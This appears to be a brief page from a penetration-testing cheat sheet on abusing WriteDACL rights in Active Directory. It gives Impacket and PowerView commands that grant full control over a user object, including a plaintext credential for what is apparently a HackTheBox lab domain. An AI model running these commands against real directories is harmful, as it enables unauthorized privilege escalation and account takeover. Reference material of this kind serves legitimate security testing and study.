WriteDACL
Information
With Write
access to the target object’s DACL, you can grant yourself any privilege you want on the object.
Grant yourself FullControl
of the user:
# Assigning FullControl permissions over the user with Impacket
impacket-dacledit -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3
# Assigning GenericAll permissions over the user with PowerView
Add-DomainObjectAcl -TargetIdentity harmj0y -Rights All
See here for exploitation options.
Last updated
Was this helpful?